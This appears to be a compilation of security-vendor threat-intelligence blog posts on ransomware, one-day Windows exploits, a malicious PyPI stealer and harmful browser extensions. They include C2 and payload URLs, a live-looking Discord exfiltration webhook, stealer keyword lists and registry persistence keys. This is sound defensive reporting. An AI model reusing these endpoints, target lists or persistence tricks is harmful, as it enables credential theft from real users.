attach.42web[.]io
attachment.a0001[.]net
bigfile[.]totalh[.]net
clouds[.]rf[.]gd
global[.]onedriver[.]epizy[.]com
global.web1337[.]net

C2 servers:
hxxp://leehr36[.]mypressonline[.]com/h[.]php
hxxp://leehr24[.]mywebcommunity[.]org/h[.]php
hxxp://weworld59[.]myartsonline[.]com/h[.]php
hxxp://weworld78[.]atwebpages[.]com/info[.]php?ki87ujhy=
hxxp://weworld78[.]atwebpages[.]com/s[.]php
hxxp://weworld78[.]atwebpages[.]com/hta[.]php
hxxp://weworld79[.]mygamesonline[.]org/hta[.]php
hxxp://glib-warnings[.]000webhostapp[.]com/info[.]php?ki87ujhy=
hxxp://glib-warnings[.]000webhostapp[.]com/s[.]php
hxxp://glib-warnings[.]000webhostapp[.]com/hta[.]php
hxxp://0knw2300[.]mypressonline[.]com/d[.]php
hxxp://21nari[.]getenjoyment[.]net/info[.]php?ki87ujhy=
hxxp://21nari[.]mypressonline[.]com/s[.]php
hxxp://21nari[.]scienceontheweb[.]net/r[.]php
hxxp://chmguide[.]atwebpages[.]com/?key=cWFLQ2hCU3ZTaUNha3hVaGdZSXRyQT09
hxxp://chunyg21[.]sportsontheweb[.]net/info[.]php?ki87ujhy=
hxxp://chunyg21[.]sportsontheweb[.]net/s[.]php
hxxp://faust22[.]mypressonline[.]com/1[.]txt
hxxp://faust22[.]mypressonline[.]com/info[.]php
hxxp://hochdlincheon[.]mypressonline[.]com/f[.]txt
hxxp://hochuliasdfasfdncheon[.]mypressonline[.]com/report[.]php?filename=
hxxp://hochulidncheon[.]mypressonline[.]com/c[.]txt
hxxp://hochulidncheon[.]mypressonline[.]com/k[.]txt
hxxp://hochulincddheon[.]mypressonline[.]com/post[.]php
hxxp://hochulincheon[.]mypressonline[.]com/c[.]txt
hxxp://hochulincheon[.]mypressonline[.]com/down[.]php
hxxp://hochulincheon[.]mypressonline[.]com/f[.]txt
hxxp://hochulincheon[.]mypressonline[.]com/k[.]txt
hxxp://hochulincheon[.]mypressonline[.]com/post[.]php
hxxp://hochulincheon[.]mypressonline[.]com/report[.]php?filename=
hxxp://hochulincheon[.]mypressonline[.]com/w[.]txt
hxxp://hochulincheon[.]mypressonline[.]com/h[.]php
hxxp://hochulindcheon[.]mypressonline[.]com/w[.]txt
hxxp://hochulindddcheon[.]mypressonline[.]com/post[.]php
hxxp://hochulinsfdgasdfcheon[.]mypressonline[.]com/post[.]php
hxxp://koreajjjjj[.]atwebpages[.]com/1[.]hta
hxxp://koreajjjjj[.]sportsontheweb[.]net/k[.]php
hxxp://kpsa20201[.]getenjoyment[.]net/d[.]php
hxxp://o61666ch[.]getenjoyment[.]net/post[.]php
hxxp://o61666ch[.]getenjoyment[.]net/report[.]php?filename=
hxxp://yulsohnyonsei[.]atwebpages[.]com/1[.]hwp
hxxp://yulsohnyonsei[.]atwewbpages[.]com/d[.]php
hxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]hwp
hxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]txt
hxxp://yulsohnyonsei[.]medianewsonline[.]com/info[.]php?ki87ujhy=
hxxp://yulsohnyonsei[.]medianewsonline[.]com/ksskdh/d[.]php
hxxp://yulsohnyonsei[.]medianewsonline[.]com/post[.]php
hxxp://yulsohnyonsei[.]medianewsonline[.]com/report[.]php?filename=

hxxp://dmengineer[.]co[.]kr/images/s_title16[.]gif  Legitimate/compromised
hxxp://dmengineer[.]co[.]kr/images/s_title17[.]gif  Legitimate/compromised
hxxp://dmengineer[.]co[.]kr/images/s_title18[.]gif  Legitimate/compromised

Blog URL

hxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/01/1[.]html
hxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/02/1[.]html
hxxps://3a8f846675194d779198[.]blogspot[.]com/2021/10/1[.]html
hxxps://c52ac2f8ac0693d8790c[.]blogspot[.]com/2021/10/1[.]html
hxxps://leejong-sejong[.]blogspot[.]com/2022/01/blog-post[.]html

2022. augusztus 24.

Ransomware updates & 1-day exploits

Introduction

In our crimeware reporting service, we analyze the latest crime-related trends we come across. Last month, we again posted a lot on ransomware, but we also covered other subjects, such as 1-day exploits. In this blogpost, we provide excerpts from these reports.

For questions or more information about our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RedAlert / N13V: yet another multiplatform ransomware variant

RedAlert (aka N13V) is the latest in the multiplatform ransomware trend we described here and here. The difference this time, though, is that it is not written in a cross-platform language but in C — at least the Linux version that we could get our hands on, was. It does, however, explicitly support ESXi environments. For example, it has the command-line option “-w”, which stops running VMs, and it also searches for VMWare-based VMs as can be seen from the screenshots below.

Note the specific VMWare-related strings the malware looks for

Stopping VMs

Interestingly, the group mentions on their onion website that a decryptor is available on all platforms. Unfortunately, we could not get our hands on the other versions, so we don’t know whether the decryptor is written in a cross-platform language or not.

Another aspect that sets RedAlert apart from other ransomware groups is that they only accept payments in Monero. From a criminal point of view, the advantage is that payments cannot be traced. The problem, however, is that Monero is not accepted in every country or by every exchange, making a ransom payment more difficult for the victim.

Since the group is relatively young, we couldn’t find out a lot about the victimology, but RedAlert stands out as an interesting example of a group that managed to adjust their code written in C to different platforms.

Monster: Ransomware with a GUI

In July, our Darknet monitoring system detected yet another new cross-platform ransomware variant: Monster. There are a couple of peculiar properties about Monster. First, unlike other new ransomware families that are written in modern cross-platform languages (e.g. Rust, Go), Monster is written in Delphi. Second, the malware has a GUI.

This latter property is especially peculiar, as we do not remember seeing this before. There are good reasons for this, because, why would one go through the effort of implementing this when most ransomware attacks are executed using the command line in an automated way during a targeted attack? The ransomware authors must have realized this as well, since they included the GUI as an optional command-line parameter.

GUI used by Monster

The rest of the ransomware is fairly typical. RSA + AES are used, and multiple threads help  to speed up the encryption and decryption process.

In terms of victimology, we found a couple of victims located all over the world (Singapore, Indonesia, Bolivia).

CVE-2022-24521: private 1-day exploits used for attacking Windows 7-11

Cybercriminals have the capabilities to create so-called 1-day exploits within a matter of day(s) after the vulnerability is reported or fixed. This is the reason why many security professionals urge system admins and users to install security patches as soon as possible.

One such example is CVE-2022-24521, an arbitrary pointer dereference in the Common Log File System (CLFS) driver, which has a long history of vulnerabilities. CVE-2022-24521  allows an attacker to gain system privileges on the infected device and is exploited in different ways by various actors. Although this time, it must be said it took the criminals a little bit longer than usual to develop an exploit: two weeks after the vulnerability was disclosed. We did, however, find an exploit with a PE-timestamp dated about one week after the patch was released, indicating that a working exploit might have been available even earlier. In total, we found two different exploits, both having several versions. In both cases, the developers sell exploits privately and do not share them on GitHub or other online platforms.

What is particularly interesting about these exploits is that they support a variety of Windows versions. This is something we usually see in commercial exploits. But the exploits have more in common: the two share a lot of debug messages. Because of these debug messages and the overall design of one of the exploits, we were able to link it to the other exploit for a much older vulnerability in the CLFS driver. In fact, we can say that the older exploit was reused for the newer vulnerability.

Finally, it is worth mentioning that one of the exploits was used in the wild during an attack on a large retailer in the APAC region.

Conclusion

In this blogpost, we stepped away — even though just slightly — from solely covering ransomware. Although ransomware is still one of the biggest threats to organizations, one should realize how these attacks actually take place. Quite often criminals use exploits for which patches are already available, simply because the affected organizations do not have an optimal patching policy.

Proper threat intelligence can help organizations to protect themselves against these types of threats, despite a non-ideal policy. For example, as we highlighted in this blogpost, criminals sometimes reuse older exploit code for newer vulnerabilities. Properly written Yara rules help to catch these newer exploits. Also, discussing TTPs and what is currently popular amongst ransomware groups helps organizations to make better-informed decisions on how to protect their environments.

2022. augusztus 17.

Black Hat USA 2022 and DEF CON 30

Black Hat 2022 USA Briefings wrapped up this past week, along with its sister conference DEF CON 30. The DEF CON theme was a “Hacker Homecoming”, and it really was a fun one. Coming back from the COVID hiatus, the conferences were enthusiastically full compared to the 2021 ghost town. Many of the talks were great, fresh content.

With the parties and the CTF fun humming along, excellent briefings included Kim Zetter’s insights on “Pre-Stuxnet, Post-Stuxnet: Everything Has Changed, Nothing Has Changed”. She is the first journalist to keynote Black Hat, and she intended to speak on the changes that Stuxnet brought, and the stuff that gets ignored until it’s too late. She specifically included discussion of elections infrastructure security, and cybernorm challenges in light of recent activity in Eastern Europe and the Middle East.

Kim listed the major changes that came about following Stuxnet:

  • A reversed trend in trickle down techniques and tools, now from APT to the crimey underground
  • Launched a cyber arms race and militarization of cyberspace
  • Politicization of security research and defense
  • Introduction of serious ICS vulnerabilities impacting critical infrastructure

Zetter highlighted the legitimate election security discussion, and said that it’s important to talk about, in spite of the consistent misappropriation and misinformation coming from high volume conspiracy groups. She spoke about various voting count incidents and the lack of accountability in very specific incidents. Of course, these actual events have been and will be spun up into misinformation content, which is unfortunate, but the legitimate discussion must be held. Interestingly, OAN members were later allegedly kicked out of DEF CON, specifically from the Voting Village.

Zetter noted from a 1997 “CRITICAL FOUNDATIONS PROTECTING AMERICA’S INFRASTRUCTURES” Report of the President’s Commission on Critical Infrastructure Protection, “The capability to do harm—particularly through information networks—is real; it is growing at an alarming rate; and we have little defense against it.” Keep in mind it was authored 25 years ago.

Fast forward to 2022 and Kim makes mention of the technical debt leading to the Colonial Pipeline ransomware fiasco that led to an overwhelming of the east coast fuel supply chain. She discussed how quickly Colonial paid the ransom, their lack of security preparation, and preceding audits of their “atrocious” security practices, “an eight grader could have hacked that system”. Not long after, CISA re-released yet another set of security guidelines for pipeline owner/operators. Unfortunately, Kim didn’t provide any mention of accountability for the decision-makers behind the Colonial fiasco.

Her talk turned to the challenges to “cyber-norms” that the Ukraine-related ITArmy presents and the recent incidents in Iran with 4,000 gas pumps being disabled and a severe equipment malfunction at a steel plant, suggesting these events also will likely leave an impact on the future stability of cyberspace.

Another favorite talk came from an individual still tied up in Taiwan with Visa issues. Orange Tsai enthusiastically gave a remote, well structured, insightful explanation of his research on Microsoft’s Hash Tables and attacking them from IIS with “Let’s Dance in the Cache – Destabilizing Hash Table on Microsoft IIS”. The codebase he addressed is decade+ old, and he danced all over web services and their authentication. Hopefully he will be in-person for future work.

Amongst all the village dazzle, DEF CON included a social engineering village, and talks included policy discussion, panels on getting a start in social engineering, and more. Their live action vishing challenge is a thrill. I am catching up on one of the recommended reading titles from a panel “How to Make People Like You in 90 Seconds or Less”.

It’s great to see people slowly returning to fully masked, in-person venues. See you next year!

2022. augusztus 16.

Two more malicious Python packages in the PyPI

On August 8, CheckPoint published a report on ten malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers’ personal data and credentials.

Following this research, we used our internal automated system for monitoring open-source repositories and discovered two other malicious Python packages in the PyPI. They were masquerading as one of the most popular open-source packages named “requests“.

Timeline of uploaded packages:

Package name Version Timestamp (UTC) pyquest 2.28.1 2022-07-30 10:11:47.000 pyquest 2.28.2 2022-07-30 10:15:28.000 pyquest 2.28.3 2022-07-30 10:19:14.000 ultrarequests 2.28.3 2022-07-30 10:25:41.000

The attacker used a description of the legitimate “requests” package in order to trick victims into installing a malicious one. The description contains faked statistics, as if the package was installed 230 million times in a month and has more than 48000 “stars” on GitHub. The project description also references the web pages of the original “requests” package, as well as the author’s email. All mentions of the legitimate package’s name have been replaced with the name of the malicious one.

After downloading the malicious packages, it becomes clear that the source code is nearly identical to the code of the legitimate “requests” package, except for one file: exception.py. In the malicious package, this script was last modified on July 30, exactly on the date of publication of the malicious package.

The malicious payload is a Base64-encoded Python script hidden in the “HTTPError” class. The script writes another Python one-liner script into a temporary file and then runs that file via the system.start() function. Then that one-liner script downloads the next-stage script from https://zerotwo-best-waifu[.]online/778112985743251/wap/enner/injector and executes it.

Downloader

The next stage is a downloader obfuscated with a publicly available tool named Hyperion. Obfuscation is done using multiple techniques, such as renaming variables and library functions, adding mixed boolean-arithmetic expressions and junk code, and compressing the code chunks with the zlib library.

The downloader terminates if the OS name is not “nt” (Windows). It randomly selects one of the directories under C:\Users\<username>\AppData\Roaming or C:\Users\<username>\AppData\Local, generates a random eight-characters string consisting of the “bcdefghijklmnopqrstuvwxyz” characters and randomly picks one of extensions from the following list:

['.dll', '.png', '.jpg', '.gay', '.ink', '.url', '.jar', '.tmp', '.db', '.cfg']

Then the malware downloads the final stage payload from https://zerotwo-best-waifu[.]online/778112985743251/wap/shatlegay/stealer123365, saves it to the previously generated location and executes it.

In order to achieve persistence on the infected machine, the malware creates a registry value with name “Realtek HD Audio Universal Service” in the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows system registry branch.

The script searches for an existing executable in the %system32% directory, named SecurityHealthSystray.exe or the SystemSettingsAdminFlows.exe, adds a “&” character (to ensure sequential execution in a command-line string), and then adds the location of the Python interpreter with the location of the malicious script. It is worth noting that this method does not work properly, as the system starts only the first executable, and the persistence is not actually achieved.

C:\Windows\System32\<SecurityHealthSystray.exe | SystemSettingsAdminFlows.exe> & <Python interpreter path> <generated path for dropped final payload>

Final payload: W4SP Stealer

The final payload is a Trojan written in Python and obfuscated with the same obfuscator as the downloader. The malware is dubbed “W4SP Stealer” by its author in the code.

Upon launching, the stealer identifies the external IP address of the victim’s machine by making a GET request to https://api.ipify.org and installs two legitimate PyPI packages – “requests” and “pycryptodome” in order to send exfiltrated data to the operator and work with cryptography for decrypting cookies and passwords from browsers. Then the malware starts collecting Discord tokens, saved cookies and passwords from browsers in separate threads.

Collected passwords and cookies are stored in the files %TEMP%\wppassw.txt and %TEMP%\wpcook.txt in the following format:

UR1: <URL> | U53RN4M3: <USERNAME> | P455W0RD: <DECRYPTED_PASSWORD>

H057 K3Y: <HOST_KEY> | N4M3: <NAME>| V41U3: <DECRYPTED_COOKIE>

All files created by the stealer on the victim’s machine start with the line: “<–W4SP STEALER ON TOP–>”.  All collected data is sent to the operator via a Discord webhook (https://discord[.]com/api/webhooks/1001296979948740648/4wqCErLU3BVeKWnxDA70Gns5vcfxh5OCb3YDIFZaFujqfSRIwHH4YIu3aLOVWjCDeO1H) and rendered in a prettified format:

The stealer also creates and sends a list of saved browser credentials for the URLs containing keywords “mail”, “card”, “bank”, “buy”, “sell”, etc. (see Appendix for a full list). Apart from that, it gathers data from the MetaMask, Atomic and Exodus wallets, as well as Steam and Minecraft credentials.

Having collected credentials, the stealer starts traversing the victim’s directories named Downloads, Documents and Desktop, looking for filenames containing the following words:

'passw', 'mdp', 'motdepasse', 'mot de passe', 'login', 'paypal', 'banque', 'account', 'metamask', 'wallet', 'crypto', 'exodus', 'discord', '2fa', 'code', 'memo', 'compte', 'token'

Interestingly, this list contains multiple French words: “mot de passe” (password), “mdp” (abbreviation for “mot de passe”), “banque” (bank), “compte” (account). The matching files are then uploaded to the same Discord channel.

The stealer also downloads a JavaScript payload from zerotwo-best-waifu[.]online/778112985743251/wap/dsc_injection, writing it into Discord’s index.js file. Then it kills the running discord.exe process, so that the user has to restart Discord, thus activating the payload.

subprocess.Popen('taskkill /im discord.exe /t /f',shell=true)

The injected script monitors the victim’s actions such, as changing their email address, password or billing information. The updated information is also sent to the Discord channel.

We have already reported these two packages to the PyPI security team and Snyk Vulnerability Database.

Kaspersky solutions detect the threat with the following verdicts:

  • Trojan.Python.Inject.d
  • Trojan.Python.Agent.gj
IOCs Samples 34c9d77afd77611ce55716f23594275a ultrarequests-2.28.3.tar.gz f2102dee0caba546ef98b47b373bab9a pyquest-2.28.3.tar.gz 556ee928fbffd4bbd1cec282ec1a5bb3 Downloader Script 42f0f3b4d5a2be7f09d1c02668cb2c08 injected Discord index.js d7b6df674690c2e81c72ea031ed44a6f W4SP stealer URLs

https://zerotwo-best-waifu[.]online/778112985743251/wap/enner/injector
https://zerotwo-best-waifu[.]online/778112985743251/wap/shatlegay/stealer123365
https://zerotwo-best-waifu[.]online/778112985743251/wap/dsc_injection

Appendix [‘mail’, ‘[coinbase](https://coinbase.com)’, ‘[gmail](https://gmail.com)’, ‘[steam](https://steam.com)’, ‘[discord](https://discord.com)’, ‘[riotgames](https://riotgames.com)’, ‘[youtube](https://youtube.com)’, ‘[instagram](https://instagram.com)’, ‘[tiktok](https://tiktok.com)’, ‘[twitter](https://twitter.com)’, ‘(https://facebook.com)’, ‘card’, ‘[epicgames](https://epicgames.com)’, ‘[spotify](https://spotify.com)’, ‘[yahoo](https://yahoo.com)’, ‘[roblox](https://roblox.com)’, ‘[twitch](https://twitch.com)’, ‘[minecraft](https://minecraft.net)’, ‘bank’, ‘[paypal](https://paypal.com)’, ‘[origin](https://origin.com)’, ‘[amazon](https://amazon.com)’, ‘[ebay](https://ebay.com)’, ‘[aliexpress](https://aliexpress.com)’, ‘[playstation](https://playstation.com)’, ‘[hbo](https://hbo.com)’, ‘[xbox](https://xbox.com)’, ‘buy’, ‘sell’, ‘[binance](https://binance.com)’, ‘[hotmail](https://hotmail.com)’, ‘[outlook](https://outlook.com)’, ‘[crunchyroll](https://crunchyroll.com)’, ‘[telegram](https://telegram.com)’, ‘[pornhub](https://pornhub.com)’, ‘[disney](https://disney.com)’, ‘[expressvpn](https://expressvpn.com)’, ‘crypto’, ‘[uber](https://uber.com)’, ‘[netflix](https://netflix.com)’]
2022. augusztus 16.

Threat in your browser: what dangers innocent-looking extensions hold for users

Whether you want to block ads, keep a to-do list or check your spelling, browser extensions allow you to do all of the above and more, improving convenience, productivity and efficiency for free, which is why they are so popular. Chrome, Safari, Mozilla — these and many other major Web browsers — have their own online stores to distribute thousands of extensions, and the most popular plug-ins there reach over 10 million users. However, extensions are not always as secure as you might think — even innocent-looking adds-on can be a real risk.

Browser add-ons are in demand among people of different ages. For example, children can add virtual pets to their browser, while adults usually prefer productivity trackers and timers

First of all, not every innocent-looking extension is, in fact, innocent. Malicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with illegitimate ones. Some of them may even impersonate a popular legitimate extension, their developers going so far as to stuff keywords so that their extension appears near the top of the browser’s extension store.

Malicious and unwanted add-ons are often distributed through official marketplaces. In 2020, Google removed 106 browser extensions from its Chrome Web Store. All of them were used to siphon off sensitive user data, such as cookies and passwords, and even take screenshots; in total, these malicious extensions were downloaded 32 million times. Victims of these attacks were not only individuals, but also businesses. Overall, more than 100 networks were abused, giving threat actors a foothold on financial service firms, oil and gas companies, the healthcare and pharmaceutical industries, government and other organizations. Another malicious Google Chrome extension that was available for download even in the official store could recognize and steal payment card details entered in web forms. Google deleted it from the Chrome Web Store, but the malware had already infected more than 400 Chrome users, putting their data at huge risk.

Sometimes the user can assess the risks by looking at what permissions an extension requests when installed from the store. If you see that an add-on is asking for far more permissions than it theoretically needs, that’s a serious cause for concern. For example, if a regular browser calculator requires access to your geolocation or browsing history, or wants to take screenshots of pages, it’s better not to download it at all.

However, analyzing extension permissions may not always help. Often the wording provided by browsers is so vague that it is impossible to tell exactly how secure an extension is. For example, basic extensions often require permission to “read and change all your data on the websites you visit.” They may really need it to function properly, but this permission potentially gives them large power.

Even if extensions have no malicious functionalities, they can still be dangerous. The danger arises from the fact that many extensions, after gaining access to “read all the data on all websites,” collect massive amounts of data from web pages users visit. To earn more money, some developers may pass it on to third parties or sell it to advertisers. The problem is that sometimes that data is not anonymized enough, so even non-malicious extensions can harm users by exposing their data to someone who is not supposed to see what websites they visit and what they do there.

A regular spell checker asks permission to “read and change all your data on all websites,” which could potentially pose a risk

Additionally, extension developers are also able to push out updates without requiring any action by the end user, which means that even a legit extension could be later turned into malware or unwanted software. For instance, when an account of the developer of a popular add-on was hijacked after a phishing attack, millions of users received adware on their devices without their knowledge. Sometimes developers sell a browser extension after it has gained a huge following. After fraudsters purchase the extension, they can update it with malicious or unwanted features, and that update will be pushed to users. In that way, over 30,000 users got adware after an installed extension, dubbed Particle, was sold to new developers and later modified to inject ads into websites.

Methodology

In this research, we observed various types of threats that mimic useful web browser extensions, and the number of users attacked by them. For this purpose, we analyzed threat statistics from Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users, for the period between January 2020 and June 2022. Additionally, we prepared in-depth characteristics of four popular threats, hiding as browser add-ons, with examples of which applications they can mimic and what danger they hold for users.

Key findings
  • Throughout the first half of this year, 1,311,557 users tried to download malicious or unwanted extensions at least once, which is more than 70 percent of the number of users affected by the same threat throughout the whole of last year.
  • From January 2020 to June 2022, more than 4.3 million unique users were attacked by adware hiding in browser extensions, which is approximately 70 percent of all users affected by malicious and unwanted add-ons.
  • The most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect users to affiliate links.
Browser extensions threats: in figures

Since the beginning of 2020, Kaspersky products prevented 6,057,308 users from downloading malware, adware and riskware disguised as browser extensions. Our findings show that, during the analyzed period, the number of such users peaked in 2020 and reached 3,660,236. In 2021, the number of affected users halved, and we saw 1,823,263 unique users attempting to download malicious or unwanted extensions. This year shows that in H1 1,311,557 users tried to download malicious and unwanted extensions at least once. This is more than 70 percent of the number of users affected throughout the whole of last year, despite 2022 having six months left to run.

Number of unique users affected by malicious or unwanted browser extensions (download)

Our telemetry shows that the most common threat spread under the guise of browser extensions is adware — unwanted software designed to promote affiliates rather than improve user experience. Such ads are usually based on the browser history to tap users’ interests, redirect them to affiliate pages that the adware developers earn money from or embed affiliate banners and links in web pages. From January 2020 to June 2022, we observed more than 4.3 million unique users attacked by adware hiding in browser extensions, which means approximately 70 percent of all affected users encountered this threat. Of these, more than 1 million users encountered adware in the first half of 2022.

Affiliate ads even appear on the side of the search result page — all to draw the user’s attention to it

The second most widespread threat was malware (a type of computer program designed to infect a legitimate user’s computer and inflict harm on it in multiple ways). The aim of some malicious extensions is to steal login credentials and other sensitive information. In addition to stealing cookies and data copied to the clipboard, they can function as keyloggers — monitoring software that is able to track and capture everything users type, making it a huge threat to victims’ sensitive data, such as credentials and credit card details.

From January 2020 to June 2022, we observed over 2.6 million unique users who were attacked by malware in the guise of a browser extension. This is 44 percent of all users who encountered malicious or unwanted extensions during this period.

The most common threat families in 2022 hiding as browser extensions

To provide a more detailed insight into how malicious and unwanted extensions operate, we also compiled an in-depth analysis of four threat families. We analyzed if they are distributed in a legitimate web store or in a different way, what useful extension functions they can use as a disguise, and how active they were in the first half of 2022.

WebSearch

The most common threat in the first half of 2022 was the WebSearch adware family, detected as not-a-virus:HEUR:AdWare.Script.WebSearch.gen. In the first half of 2022, 876,924 unique users encountered WebSearch. Typically, this threat mimics tools for working with documents, such as DOC to PDF converters, document mergers, etc. First of all, WebSearch extensions change the browser’s start page so that, instead of the familiar Chrome page, the user sees a minimalistic site consisting of a search engine and several links to third-party resources, such as AliExpress or Farfetch. The transition to these resources is carried out through affiliate links — this is how attackers earn money from their extensions. The more often users follow these links, the more money the extension developers make.

The browser’s new-look home page after being hit by WebSearch

Also, the extension modifies the browser’s default search engine to search.myway[.]com, which can capture user queries, collect and analyze them. Depending on what the user searched for, most relevant partner sites will be actively promoted in the search results.

WebSearch extensions track everything the user searches for, then promote these products with affiliate ads on search engines

Office workers, who often have to use PDF viewers or converters at work, may be the most frequent victims of this threat, as WebSearch mostly hides behind this functionality. Usually, the extension performs its declared useful function so that the user doesn’t uninstall it.

Examples of this family are:

kpocjpoifmommoiiiamepombpeoaehfh EasyPDFCombine mallpejgeafdahhflmliiahjdpgbegpk PDF Viewer & Converter by FromDocToPDF fncbkmmlcehhipmmofdhejcggdapcmon EasyPDFCombine ceopoaldcnmhechacafgagdkklcogkgd OnlineMapFinder mabloidgodmbnmnhoenmhlcjkfelomgp EasyDocMerge

Currently this extension is no longer available in the Chrome Web Store, but can still be downloaded from third-party file-sharing resources and installed manually.

DealPly-related extensions

DealPly-related extensions are adware, the first variations of which appeared back in late 2018, but remain popular with cybercriminals. These extensions are detected with the following verdicts:

  • HEUR:AdWare.Script.Generic
  • HEUR:AdWare.Script.Extension.gen.

Between January and June 2022, 97,515 unique Kaspersky users encountered DealPly-related add-ons.

Unlike the WebSearch family, these extensions are not installed by the user, but by the adware executable DealPly, which Kaspersky products detect as not-a-virus:AdWare.Win32.DealPly. Usually users get infected with DealPly when trying to download a loader of some hacked software from untrustworthy resources. Similar to the previous threat family, DealPly-related extensions also change the start page of the browser to place affiliate links on it.

The new start page of the browser consists mainly of links to affiliate websites

In order to intercept user requests, the default search engine is changed. All queries that users make on this search engine are analyzed by the extension ⁠— based on the keywords entered in the queries, the user is redirected to a suitable partner site.

The threat analyzes the keyword “iPhone” and, based on this, suggests a suitable offer on the partner website

To provide persistence for its extensions, DealPly creates the following branches in the Windows registry:

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\bifdhahddjbdbjmiekcnmeiffabcfjgh HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\bifdhahddjbdbjmiekcnmeiffabcfjgh HKEY_CURRENT_USER\Software\Google\Chrome\Extensions\bifdhahddjbdbjmiekcnmeiffabcfjgh

with the value “update_url”=”hxxp[:]//juwakaha[.]com/update“. This value provides browsers with the path to extension updates. Even if the user removes the add-on, each time the browser is launched it will download and reinstall it using this path. Note that the browser updates DealPly-related extensions, although they are installed from third-party servers, and not from the official Chrome Web Store.
We assume that the most frequent victims of this threat are those who download hacked software from dubious resources; common examples of programs that DealPly mimics are KMS activators (programs that activate hacked Windows for free) or cheatengine, used to hack computer games. In addition, DealPly can also mimic installers of various software, including proprietary software.

Examples of DealPly-related extensions are:

bifdhahddjbdbjmiekcnmeiffabcfjgh Internal Chromium Extension ncjbeingokdeimlmolagjaddccfdlkbd Internal Chromium Extension nahhmpbckpgdidfnmfkfgiflpjijilce Search Manager pilplloabdedfmialnfchjomjmpjcoej Search Manager AddScript

AddScript is another threat family, hiding under the guise of browser extensions. The first samples of this family were seen in early 2019, and it remains active. In the first half of 2022, we observed 156,698 unique users that encountered AddScript.

Typically, extensions of this family do have useful functions. For example, they can be tools for downloading music and videos from social networks or proxy managers. However, in addition to the useful functionality, such extensions also carry out malicious activity.

AddScript malicious code

The malicious code is obfuscated. When the extension is running, it contacts a hardcoded URL to get the C&C server address. It then establishes a connection to the C&C server, receives malicious JavaScript from it, and runs it covertly. The only way the user can notice the execution of third-party instructions is by the increased consumption of processor power.

The malicious script is updated from time to time and may perform various functions. For example, it can unobtrusively run videos on the victim’s computer, so that its owners profit from the video being “viewed.” Another variant of malicious JavaScript performs cookie stuffing (also called “cookie dropping”). Traditionally, different brands promote affiliate products on their sites. When a visitor clicks the affiliate link, an affiliate cookie is saved on their device. If the user then makes a purchase on the partner’s page, the owner of the site that saved the affiliate cookie gets a commission. AddScript drops multiple affiliate cookies without the user clicking any links on any sites, in order to claim the commission for transactions that happen in the browser. Put simply, the fraudsters trick websites into thinking they have sent them traffic without actually doing so.

Examples of this family are:

hdbipekpdpggjaipompnomhccfemaljm friGate3 proxy helper lfedlgnabjompjngkpddclhgcmeklana SaveFrom.net helper aonedlchkbicmhepimiahfalheedjgbh Helper (an easy way to find the best prices) oobppndjaabcidladjeehddkgkccfcpn Y2Mate – Video Downloader

Kaspersky products detect AddScript extensions with the verdict HEUR:Trojan.Script.Generic.

FB Stealer

Another malicious browser extension family is FB Stealer. It is one of the most dangerous families, because in addition to the already traditional search engine substitution, FB Stealer is able to steal user credentials from Facebook. From January to June 2022, Kaspersky security solutions detected 3,077 unique users who encountered FB Stealer.

FB Stealer is installed by the malware rather than by the user. Once added to the browser, it mimics the harmless and standard-looking Chrome extension Google Translate.

colgdlijdieibnaccfdcdbpdffofkfeb Google Translate fdempkefdmgfcogieifmnadjhohaljcb Google Translate

Malicious FB Stealer extension added from third-party resources. Browser warns that it has no information about this extension

The Trojan delivering FB Stealer is called NullMixer. It masquerades as a cracked software installer, and thus reaches users.

NullMixer spreads through hacked software installers, for example, SolarWinds Broadband Engineers Edition

Downloading a password-protected archive with NullMixer inside

The extension files are stored in the resources section of the NullMixer executable and, during installation, are copied to the %AppData%\Local\Google\Chrome\User Data\Default\Extensions folder. The installer also modifies the Secure Preferences file, which contains Chrome settings, including information about extensions. As soon as this is done, the extension becomes active.

Similar to previous families, the extension changes the default search engine. In this case, it sets it to hxxps[:]//www.ctcodeinfo[.]com. In addition, the attackers extract Facebook session cookies — secrets stored in the browser that hold identification data allowing users to stay logged in — and send them to their own servers. Using these cookies, they are able to quickly log in to the victim’s Facebook account and hijack it by changing the login details. Once inside the account, the attackers can ask the victim’s friends for money, trying to get as much as possible before the user regains access to the account.

Attackers use script obfuscation techniques to hide malicious code

Conclusion and recommendations

Browser extensions remain one of the most common ways for cybercriminals to get money, whether by redirecting users to affiliate pages, cookie stuffing or even stealing the victim’s credentials. Hence, numerous users might wonder: is it worth downloading browser extensions at all if they carry so many threats? We believe that extensions only improve the user online experience, and some add-ons can even make devices a lot safer. That said, it’s important to keep an eye on how reputable and trustworthy the developer is, and what permissions the extension asks for. If you follow the recommendations for safe use of browser extensions, the risk of encountering the threats described above will be minimal.

To stay safe while using browser add-ons:

  • Only use trusted sources to download software. Malware and unwanted applications are often distributed through third-party resources, where no one checks their security like official web stores do. These applications may install malicious or unwanted browser extensions without the user knowing about it, and perform other malicious or unwanted activity.
  • Since extensions add extra functionality to browsers, they require access to various resources and permissions — you should carefully examine add-on requests before agreeing to them.
  • Limit the number of extensions used at any one time and periodically review your installed extensions. Uninstall extensions that you no longer use or that you do not recognize.
  • Use a robust security solution. Private Browsing in Kaspersky Internet Security, for example, prevents online monitoring and protects you from web threats.
Indicators of compromise

WebSearch extension MD5
dd7bd821cd4a88e2540a01a9f4b5e209

WebSearch extension ID
kpocjpoifmommoiiiamepombpeoaehfh
fncbkmmlcehhipmmofdhejcggdapcmon
mallpejgeafdahhflmliiahjdpgbegpk
ceopoaldcnmhechacafgagdkklcogkgd
mabloidgodmbnmnhoenmhlcjkfelomgp

DealPly installer MD5
E91538ECBED3228FF5B28EFE070CE587

DealPly-related extension MD5
38a7b26c02de9b35561806ee57d61438

DealPly-related extension ID
bifdhahddjbdbjmiekcnmeiffabcfjgh
ncjbeingokdeimlmolagjaddccfdlkbd
